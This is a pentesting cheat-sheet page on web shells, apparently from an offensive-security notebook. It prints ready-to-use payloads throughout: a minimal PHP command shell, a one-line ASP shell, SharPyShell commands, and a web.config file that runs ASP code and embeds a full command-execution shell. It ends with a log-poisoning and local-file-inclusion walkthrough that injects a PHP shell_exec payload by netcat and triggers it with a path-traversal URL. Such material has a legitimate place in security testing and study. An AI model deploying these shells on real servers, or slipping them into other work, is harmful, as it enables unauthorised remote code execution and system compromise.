# Webshell

## Webshell

### PHP 15 bytes shell

```
<?=`$_GET[0]`?>
```

{% embed url="<https://pbs.twimg.com/media/FKmzH22XIAIIPdQ?format=png&name=900x900>" %}

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MWd-VcvRHVgUtkahm85%2Fuploads%2FyZHT1VlGin8YMNUYvsMq%2Fimage.png?alt=media\&token=10b4ebc8-68f9-4e06-b2a7-487856214eee)

### Asp/Aspx

**One Line ASP Shell**

```aspnet
<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>
```

Request with: <http://target/shell.asp?cmd=ipconfig>

&#x20;[**SharPyShell**](https://github.com/antonioCoco/SharPyShell): SharPyShell - tiny and obfuscated ASP.NET webshell for C# web applications.

```php
python SharPyShell.py generate -p somepassword
python SharPyShell.py interact -u http://target.url/sharpyshell.aspx -p somepassword
```

### **Running web.config as an ASP file**

Sometimes IIS supports ASP files but it is not possible to upload any file with .ASP extension. In this case, it is possible to use a web.config file directly to run ASP classic codes:

```aspnet
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
```

{% embed url="<https://github.com/tennc/webshell/tree/master/fuzzdb-webshell/asp>" %}
Examples of asp webshells.
{% endembed %}

```aspnet
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
 
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
    Dim objShell, objCmdExec
    Set objShell = CreateObject("WScript.Shell")
    Set objCmdExec = objshell.exec(thecommand)
    getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
%>

<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
```

Reference&#x73;**:** <https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/>

### **Log poisoning + LFI + shell**

Required: Initial LFI found :smirk\_cat:&#x20;

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MXHfTwQGzXRX49GrnRK%2F-MXHheLXUfbhYi3tAi1R%2Fimage.png?alt=media\&token=3a723cd1-de19-43d0-9e75-4e0b0f791eb1)

Here you will get intercepted data where we need to inject our cmd comment inside user-agent by replacing highlighted data.

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MXHfTwQGzXRX49GrnRK%2F-MXHhol_wtsfiRQBBqyI%2Fimage.png?alt=media\&token=b23e74cf-70be-4d36-a728-a9d61f1d2a95)

We can also try to add via netcat:

```php
nc -nv 10.11.1.35 80
 (UNKNOWN) [10.11.1.35] 80 (http) open
   <?php echo shell_exec($_GET['cmd']);?>
   
HTTP/1.1 400 Bad Request
```

Next, get RCE by adding the **cmd** parameter:

```php
http://10.11.15.137/addguestbook.php?name=aaa&comment=aaa&cmd=dir%20&LANG=../../../../../../../xampp/apache/logs/access.log%00
```

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MXHfTwQGzXRX49GrnRK%2F-MXHieG1y6czlAqchXKo%2Fimage.png?alt=media\&token=394c4063-4283-41ad-a26b-1b3adfa5dcd6)

Reference: <https://www.hackingarticles.in/apache-log-poisoning-through-lfi/>

{% embed url="<https://dheerajdeshmukh.medium.com/get-reverse-shell-through-log-poisoning-with-the-vulnerability-of-lfi-local-file-inclusion-e504e2d41f69>" %}

{% embed url="<https://shahjerry33.medium.com/rce-via-lfi-log-poisoning-the-death-potion-c0831cebc16d>" %}

{% embed url="<https://github.com/nil0x42/phpsploit>" %}